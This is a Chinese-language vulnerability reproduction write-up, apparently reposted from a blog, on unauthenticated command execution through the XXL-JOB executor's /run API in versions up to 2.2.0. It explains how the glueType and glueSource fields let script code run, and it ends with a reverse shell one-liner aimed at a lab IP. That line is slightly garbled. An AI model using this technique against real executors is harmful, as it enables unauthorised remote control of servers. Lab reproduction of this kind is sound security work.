漏洞复现----XXL-JOB executor 未授权访问漏洞

本文阅读 3 分钟

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

docker-compose up -d 
访问:
http://ip:8080即可查看到管理端(admin)
http://ip:9999可以查看到客户端(executor)
影响版本:XXL-JOB <= 2.2.0

1、XXL-JOB的Restful API分为两种,一个 调度中心Restful API,一个 执行器Restful API。其中在执行器Restful API的任务触发声明中,发送请求的数据格式为:

地址格式:
    { 执行器内嵌服务跟地址}/run     //也就是说为executor端的地址,ip:9999/run
 
Header: 
    XXL-JOB-ACCESS-TOKEN : { 请求令牌}     
 
请求数据格式如下,放置在 RequestBody 中,JSON格式: 
{  
    "jobId":1, // 任务ID 
    "executorHandler":"demoJobHandler", // 任务标识 
    "executorParams":"demoJobHandler", // 任务参数 
    "executorBlockStrategy":"COVER_EARLY", // 任务阻塞策略,可选值参考   com.xxl.job.core.enums.ExecutorBlockStrategyEnum 
    "executorTimeout":0, // 任务超时时间,单位秒,大于零时生效 
    "logId":1, // 本次调度日志ID 
    "logDateTime":1586629003729, // 本次调度日志时间 
    "glueType":"BEAN", // 任务模式,可选值参考 com.xxl.job.core.glue.GlueTypeEnum         "glueSource":"xxx", // GLUE脚本代码 
    "glueUpdatetime":1586629003727, // GLUE脚本更新时间,用于判定脚本是否变更以及是否需要刷新 
    "broadcastIndex":0, // 分片参数:当前分片 
    "broadcastTotal":0 // 分片参数:总分片 
} 
 
响应数据格式: 
    {  "code": 200, // 200 表示正常、其他失败 "msg": null // 错误提示消息 }

2、其中"glueType":"BEAN" 任务模式的选值如下

BEAN("BEAN", false, null, null),
GLUE_GROOVY("GLUE(Java)", false, null, null),
GLUE_SHELL("GLUE(Shell)", true, "bash", ".sh"), 
GLUE_PYTHON("GLUE(Python)", true, "python", ".py"), 
GLUE_PHP("GLUE(PHP)", true, "php", ".php"), 
GLUE_NODEJS("GLUE(Nodejs)", true, "node", ".js"), 
GLUE_POWERSHELL("GLUE(PowerShell)", true, "powershell", ".ps1");

我们可以从中任意选择一种脚本语言,然后在"glueSource":"xxx"中插入相对应的脚本代码即可执行相对应的命令。

访问客户端(executor),发送如下请求

利用/bin/bash -i ?& /dev/tcp/192.168.209,128/44444 0>&1即可反弹一个shell。

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/118609173
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复